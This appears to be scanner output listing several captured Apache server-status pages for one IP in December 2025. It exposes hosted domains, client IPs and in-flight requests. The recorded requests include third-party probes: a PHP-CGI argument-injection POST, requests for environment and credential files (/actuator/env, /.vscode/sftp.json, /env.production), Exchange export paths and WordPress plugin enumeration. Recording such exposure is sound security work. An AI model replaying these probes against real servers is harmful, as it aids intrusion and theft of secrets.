HTTP/1.1 1-327459280/249/3503_ 23.67133725450410.04.7976.11 172.71.146.121h2tandemsl.com:443idle, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 2-327459300/135/4476_ 18.621015990520.012.55237.82 139.59.132.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 2-327459300/120/4426W 18.610083311410.02.40188.60 139.59.132.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 2-327459300/135/4445_ 18.36917615138510.02.30161.94 172.64.223.205http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-327459300/110/4474_ 18.557054530010.01.57146.93 162.158.174.70h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-327459300/138/4432_ 18.629017867290.05.40194.11 139.59.132.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 2-327459300/140/4579_ 18.561222217273730.035.12192.85 172.68.22.85h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-327459300/126/4513_ 18.491318617513380.03.25231.04 172.68.22.84h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-327459300/123/4551_ 18.57167020038760.08.73169.18 104.23.175.17h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-327459300/119/4378_ 18.6112020189610.02.02200.99 139.59.132.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v3/api-docs HTTP/1.1 2-327459300/140/4591_ 18.628018836640.01.49134.42 139.59.132.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 3-327461090/176/4137_ 18.6527821015620590.04.21165.57 172.68.2.117h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-327461090/172/4205_ 17.75277640533833360.022.95182.16 162.158.120.205h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-327461090/166/3984_ 16.582776098705120.010.08207.13 172.68.134.56h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 3-327461090/207/4024_ 18.652782020453530.04.08145.86 172.68.34.123h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-327461090/166/4183_ 19.3327822626352680.031.25153.80 172.64.200.234h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-327461090/180/3959_ 18.652777221128960.03.84154.85 172.68.3.119h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-327461090/195/4167_ 18.652777035528070.02.83166.19 172.68.3.103h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-327461090/179/4191_ 19.3327822924817470.05.15216.86 172.64.198.44h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-327461090/184/4135_ 19.34278125319718350.02.68157.06 172.64.198.44h2lcftech.es:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 3-327461090/155/4062_ 18.284908015405590.015.79143.92 172.68.210.69h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-327459290/65/3063_ 14.9047285134438410.00.94132.48 34.94.202.89h2barrerasdecontencion.com:443idle, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 4-327459290/77/2982_ 14.0047390418955370.01.1395.59 162.158.91.115h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-327459290/78/3125_ 14.914718910947340.02.74121.31 34.94.202.89h2barrerasdecontencion.com:443idle, streams: 0/5/5/0/0 (open/recv/resp/push/rst) 4-327459290/70/3121_ 12.2717851829844280.00.76154.17 103.23.60.244http/1.1 4-327459290/67/3193_ 14.914708121546860.02.5181.70 34.94.202.89h2barrerasdecontencion.com:443idle, streams: 0/6/6/0/0 (open/recv/resp/push/rst) 4-327459290
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b0a85802b0a85802576fbaf4
Apache Status Apache Server Status for 103.23.61.80 (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Thursday, 18-Dec-2025 03:43:32 CET Restart Time: Saturday, 13-Dec-2025 07:04:06 CET Parent Server Config. Generation: 25 Parent Server MPM Generation: 24 Server uptime: 4 days 20 hours 39 minutes 25 seconds Server load: 0.10 0.09 0.09 Total accesses: 134581 - Total Traffic: 4.8 GB - Total Duration: 98863390 CPU Usage: u43.65 s40.48 cu752.13 cs455.58 - .308% CPU load .32 requests/sec - 12.1 kB/second - 37.7 kB/request - 734.601 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0457438no0yes010000 1457435no0yes010000 2457568no0yes010000 3457436no0yes010000 4457437no0yes19000 Sum500 149000 _________________________________________W________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-244574380/15/3047_ 7.60111086114442430.00.39100.17 45.156.128.167http/1.1barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-244574380/13/3168_ 7.614086142915157540.00.3065.85 45.156.128.165http/1.1barrerasdecontencion.com:443GET /wp-content/plugins/complianz-gdpr/readme.txt HTTP/1.1 0-244574380/10/2906_ 7.614086118920035740.00.28124.07 45.156.128.165http/1.1barrerasdecontencion.com:443GET /wp-content/plugins/all-in-one-wp-security-and-firewall/rea 0-244574380/10/3130_ 7.612063126916858380.00.2290.20 172.68.92.177h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-244574380/14/3029_ 8.282063016960980.00.3360.83 162.158.107.91h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-244574380/10/3255_ 7.611110107222700580.00.3398.28 45.156.128.165http/1.1barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-244574380/11/3093_ 7.614086144319833970.00.2596.45 45.156.128.165http/1.1barrerasdecontencion.com:443GET /wp-content/plugins/sg-security/readme.txt HTTP/1.1 0-244574380/14/3231_ 8.59111534113596310.00.4584.91 172.71.146.120h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-244574380/13/3029_ 7.60205852812035210.00.61140.42 45.156.128.166http/1.1barrerasdecontencion.com:443GET /wp-content/plugins/google-analytics-for-wordpress/readme.t 0-244574380/9/3021_ 7.61205834614690440.00.1596.96 172.68.92.200h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-244574350/194/2171_ 17.091007522830.04.47105.06 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 1-244574350/167/2021_ 17.098011193840.06.9451.88 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 1-244574350/165/1980_ 17.09107637460.04.0896.22 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 1-244574350/168/2031_ 17.071107141970.04.7033.61 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /api/gql HTTP/1.1 1-244574350/178/2101_ 17.09809157040.04.15103.86 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 1-244574350/198/2056_ 16.881016312911650.06.6076.75 172.71.150.177h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-244574350/187/1993_ 17.0211916070240.06.2061.83 188.114.111.93h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-244574350/183/2095_ 17.06650614484990.03.8577.25 172.70.34.82h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-244574350/190/1999_ 17.07805976410.05.52102.88 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/swagger-ui.html HTTP/1.1 1-244574350/189/2185_ 17.090012747340.06.1856.50 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 2-244575680/176/3466_ 15.11350539312584270.06.02199.40 45.156.128.165http/1.1barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-244575680/197/3461_ 15.124082080404360.05.45156.63 172.68.92.185h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-244575680/186/3444_ 15.11157818312002010.05.42126.67 45.156.128.166http/1.1barrerasdecontencion.com:443GET /wp-content/plugins/hostinger/readme.txt HTTP/1.1 2-244575680/170/3466_ 15.961583051839200.07.56115.12 172.68.234.125h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-244575680/180/3414_ 15.111578106614762260.025.10139.09 45.156.128.165http/1.1barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-244575680/196/3519_ 15.11277961413256190.06.76124.70 45.156.128.166http/1.1barrerasdecontencion.com:443GET /wp-content/plugins/ultimate-addons-for-gutenberg/readme.tx 2-244575680/177/3472_ 15.11158372513952000.04.86180.06 45.156.128.167http/1.1barrerasdecontencion.com:443GET /wp-content/plugins/really-simple-ssl/readme.txt HTTP/1.1 2-244575680/169/3532_ 15.562779016835190.04.36116.40 35.234.83.229http/1.1relehse.com:443GET /env.production HTTP/1.1 2-244575680/185/3402_ 15.11408226414569380.04.50143.07 45.156.128.165http/1.1barrerasdecontencion.com:443GET /wp-content/plugins/woocommerce/readme.txt HTTP/1.1 2-244575680/183/3550_ 15.313505114499900.04.0688.33 103.23.60.244h27f7ffb32-1f6e-4d16-bdaa-07377bcidle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-244574360/5/2868_ 7.884086130210744840.00.06115.67 45.156.128.167http/1.1barrerasdecontencion.com:443GET /wp-content/plugins/wps-hide-login/readme.txt HTTP/1.1 3-244574360/9/2946_ 7.88408579516568510.00.16117.12 45.156.128.164http/1.1barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-244574360/4/2798_ 7.88408668486663300.00.04148.16 45.156.128.166http/1.1barrerasdecontencion.com:443GET /wp-content/plugins/wordfence/readme.txt HTTP/1.1 3-244574360/3/2698_ 7.88408587111382840.00.3788.45 45.156.128.167http/1.1barrerasdecontencion.com:443GET /wp-content/plugins/seo-by-rank-math/readme.txt HTTP/1.1 3-244574360/7/2965_ 7.89408620519626680.00.1390.89 172.68.92.164h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-244574360/5/2749_ 7.874086410178400.00.05110.27 45.156.128.164http/1.1barrerasdecontencion.com:443GET /wp-content/plugins/redirection/readme.txt HTTP/1.1 3-244574360/6/2928_ 7.88408633220235580.00.1395.35 45.156.128.164http/1.1barrerasdecontencion.com:443GET /wp-content/plugins/duplicate-page/readme.txt HTTP/1.1 3-244574360/6/2941_ 7.884087107314593860.00.1192.43 45.156.128.166http/1.1barrerasdecontencion.com:443GET /wp-content/plugins/wp-optimize/readme.txt HTTP/1.1 3-244574360/3/2900_ 7.88408632410536910.00.04101.64 45.156.128.166http/1.1barrerasdecontencion.com:443GET /wp-content/plugins/updraftplus/readme.txt HTTP/1.1 3-244574360/4/2832_ 7.88408638110910150.00.0471.74 45.156.128.167http/1.1barrerasdecontencion.com:443GET /wp-content/plugins/coming-soon/readme.txt HTTP/1.1 4-244574370/26/1932_ 10.2720132577970.00.23108.80 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 4-244574370/30/1872W 10.25008639400.01.2873.15 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 4-244574370/29/1993_ 10.25206950030.01.3598.16 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v3/api-docs HTTP/1.1 4-244574370/25/1988_ 10.2
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b0a85802b0a85802c49c08ca
Apache Status Apache Server Status for 103.23.61.80 (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Tuesday, 16-Dec-2025 03:09:07 CET Restart Time: Saturday, 13-Dec-2025 07:04:06 CET Parent Server Config. Generation: 12 Parent Server MPM Generation: 11 Server uptime: 2 days 20 hours 5 minutes 1 second Server load: 0.01 0.05 0.07 Total accesses: 67213 - Total Traffic: 2.2 GB - Total Duration: 64416405 CPU Usage: u67.44 s52.49 cu322.08 cs216.06 - .268% CPU load .274 requests/sec - 9.2 kB/second - 33.6 kB/request - 958.392 ms/request 2 requests currently being processed, 48 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0286396no4yes19000 1286394no1yes19000 2286529no1yes010000 3286395no0yes010000 4286397no0yes010000 Sum506 248000 _______K_____W____________________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-112863960/378/2133_ 30.463010706890.012.9066.95 128.199.182.152http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 0-112863960/307/2099_ 30.437011590450.06.1034.69 128.199.182.152http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /webjars/swagger-ui/index.html HTTP/1.1 0-112863960/302/2014_ 30.461016385160.022.0381.17 128.199.182.152http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-112863960/314/2228_ 30.434013421140.07.4042.78 172.71.148.25h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-112863960/359/2099_ 30.451014110910.07.5540.87 128.199.182.152http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/swagger.json HTTP/1.1 0-112863960/311/2204_ 30.46250219780780.06.6053.70 172.68.10.44h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-112863960/317/2149_ 30.454016086110.025.5563.57 128.199.182.152http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 0-112863961/360/2143K 30.46026411119234.07.4148.95 172.69.50.138h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-112863960/330/2076_ 30.33209650910.011.7979.55 194.180.49.170http/1.1relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-112863960/349/2107_ 30.457011005830.08.5869.72 128.199.182.152http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 1-112863940/165/1467_ 20.132234285710.03.6482.19 172.68.135.35h2lcftech.es:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-112863940/169/1352_ 20.13107150390.03.5432.40 128.199.182.152http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 1-112863940/183/1342_ 20.132285679180.05.5779.20 172.68.135.35h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-112863940/180/1400W 20.03005109720.02.3719.03 128.199.182.152http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 1-112863940/169/1430_ 20.10606381710.02.3933.17 172.68.195.192h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-112863940/179/1335_ 20.129010064950.03.2155.14 128.199.182.152http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 1-112863940/181/1337_ 20.12107501240.02.9647.15 128.199.182.152http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 1-112863940/177/1412_ 20.14140010937890.04.9556.87 172.71.184.99h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-112863940/171/1344_ 20.12603906350.02.5185.75 128.199.182.152http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 1-112863940/176/1458_ 20.103110202630.03.4030.35 172.71.144.173h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-112865290/310/1041_ 23.22128803501020.023.4172.62 162.159.110.16h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-112865290/321/1122_ 27.92205072082020.07.1738.18 194.180.49.170http/1.1relehse.com:443GET /test.php HTTP/1.1 2-112865290/311/1129_ 25.9715773715720.06.3148.54 74.7.243.239h2barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-112865290/346/1108_ 23.70128804504020.06.8827.00 162.159.116.134h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-112865290/315/1178_ 27.5320413864780.08.2330.63 194.180.49.170http/1.1 2-112865290/302/1098_ 27.9220704626250.06.8420.42 194.180.49.170http/1.1relehse.com:443GET /info.php HTTP/1.1 2-112865290/321/1127_ 27.58153064141150.08.7255.70 104.23.245.26h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-112865290/359/1209_ 27.992014810450.05.7236.57 172.68.192.218h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-112865290/325/1094_ 21.9820603873390.06.5836.95 194.180.49.170http/1.1 2-112865290/332/1161_ 24.25203513954380.06.4928.20 172.71.146.121h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-112863950/28/1353_ 14.2017296514808520.00.2950.33 108.162.226.133h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-112863950/27/1299_ 13.2717283614643870.00.6326.99 172.68.22.84h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-112863950/25/1240_ 13.28172434273823960.00.9935.50 172.68.22.84h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-112863950/28/1272_ 13.9712893133988380.01.1946.10 172.71.210.183h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-112863950/59/1452_ 14.20173338013000580.00.6127.58 104.23.254.81h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-112863950/31/1281_ 14.3612944794302430.01.1335.06 104.22.1.64h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-112863950/31/1389_ 10.26172415714810.00.7452.19 172.68.23.49h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 3-112863950/28/1409_ 11.63237005766790.00.9039.73 104.22.24.41h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-112863950/26/1399_ 10.81128905481560.00.6534.76 172.70.115.227h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-112863950/24/1282_ 10.95172803746970.00.3117.68 172.68.7.2h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-112863970/13/708_ 12.842430336114163330.00.5752.74 172.70.208.8h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-112863970/12/646_ 13.2724354344236610.00.7034.28 162.158.88.114h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-112863970/12/715_ 12.70236102628860.00.0751.57 104.22.7.169h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-112863970/17/809_ 12.732477021340650.01.0450.29 141.101.76.33h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-112863970/17/816_ 10.592430014310140.00.3016.06 162.158.120.176h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-112863970/12/682_ 13.29236608950840.00.1136.94 162.159.116.137h2tandemsl.com:443
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b0a85802b0a8580217949600
Apache Status Apache Server Status for 103.23.61.80 (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Saturday, 13-Dec-2025 22:27:42 CET Restart Time: Saturday, 13-Dec-2025 07:04:06 CET Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 15 hours 23 minutes 36 seconds Server load: 0.00 0.02 0.03 Total accesses: 8587 - Total Traffic: 462.1 MB - Total Duration: 10772364 CPU Usage: u58.73 s50.78 cu0 cs0 - .198% CPU load .155 requests/sec - 8.5 kB/second - 55.1 kB/request - 1254.5 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0990no2yes19001 1991no0yes010000 2992no0yes010000 3993no0yes010000 41338no1yes010000 Sum503 149001 W_________________________________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-09900/399/399W 28.69003172600.030.3030.30 46.101.111.185http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 0-09900/395/395_ 28.69005513200.07.597.59 46.101.111.185http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-09900/408/408_ 28.421142916600.011.3811.38 162.158.122.178h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-09900/413/413_ 28.6633066688880.07.877.87 172.69.9.67h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-09900/399/399_ 28.4172089119410.08.498.49 172.71.191.16h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-09900/380/380_ 28.691012812630.021.6521.65 46.101.111.185http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 0-09900/427/427_ 28.67708515370.010.2810.28 46.101.111.185http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v3/api-docs HTTP/1.1 0-09900/394/394_ 28.68604040190.016.0116.01 46.101.111.185http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/swagger.json HTTP/1.1 0-09900/384/384_ 28.6873282974690.06.756.75 172.69.9.67h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-09900/421/421_ 28.69503898930.012.6112.61 46.101.111.185http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 1-09910/36/36_ 15.26518046450.01.451.45 172.71.223.218h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-09910/31/31_ 15.3766057548690.01.201.20 172.68.151.151h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-09910/27/27_ 15.2751843941330.021.9521.95 104.23.213.121h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-09910/34/34_ 15.736651628770.01.481.48 162.158.122.178h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-09910/26/26_ 15.66518048000.01.001.00 172.68.135.90h2tandemsl.com:443done, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 1-09910/31/31_ 15.2566005114910.01.021.02 162.158.78.120h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-09910/35/35_ 15.78524065090.02.982.98 172.68.76.162h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-09910/22/22_ 15.12523159990.00.500.50 162.158.42.137h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-09910/30/30_ 15.78523042130.07.647.64 172.68.76.154h2tandemsl.com:443idle, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 1-09910/30/30_ 15.78523390280.00.400.40 172.68.76.162h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 2-09920/27/27_ 15.6847627232490.011.3911.39 172.71.194.24h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-09920/18/18_ 15.16356322160.00.680.68 104.23.209.225h2lcftech.es:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 2-09920/27/27_ 15.17471066410.00.280.28 172.71.223.65h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-09920/20/20_ 15.56518038500.00.310.31 172.68.135.218h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-09920/31/31_ 15.7921039360.02.002.00 46.101.111.185http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /api/gql HTTP/1.1 2-09920/18/18_ 15.1721437780.00.140.14 172.71.190.156h2lcftech.es:443done, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 2-09920/26/26_ 15.16471252810.01.041.04 172.68.245.44h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-09920/26/26_ 15.71361024310.01.731.73 162.159.106.81h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-09920/29/29_ 15.67356068000.02.272.27 172.68.76.135h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-09920/19/19_ 15.16361016440.00.790.79 104.23.209.221h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-09930/25/25_ 15.69235149150.011.4411.44 162.158.122.177h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-09930/27/27_ 15.0793025880.02.832.83 172.70.39.84h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-09930/23/23_ 15.739831624180.00.340.34 172.64.217.135h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-09930/25/25_ 15.0693022570.013.5813.58 104.23.213.36h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-09930/19/19_ 15.61513110040.01.161.16 172.68.76.133h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 3-09930/18/18_ 15.08514011500.00.840.84 172.70.34.48h2lcftech.es:443done, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 3-09930/28/28_ 15.0623008950.01.331.33 172.70.35.181h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-09930/21/21_ 15.05516054620.02.122.12 172.70.135.199h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-09930/22/22_ 15.6151607850.00.970.97 172.68.76.133h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-09930/20/20_ 15.61230046570.00.250.25 172.68.76.166h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-013380/385/385_ 30.5411761302890.033.2233.22 172.71.194.25h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-013380/348/348_ 30.60113373483790.013.3413.34 162.158.167.120h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-013380/376/376_ 30.80201326840.042.9142.91 46.101.111.185http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/index.html HTTP/1.1 4-013380/363/363_ 30.8011017311760.041.2541.25 46.101.111.185http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api-docs/swagger.json HTTP/1.1 4-013380/391/391_ 30.813010825740.09.249.24 46.101.111.185http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 4-013380/382/382_ 30.7643031252620.027.8227.82 172.69.17.163h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-013380/420/420_ 30.81201363440.015.2715.27 46.101.111.185http/1.17f7ffb32-1f6e-4d16-bdaa-073
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b0a85802b0a858027dbff0ee
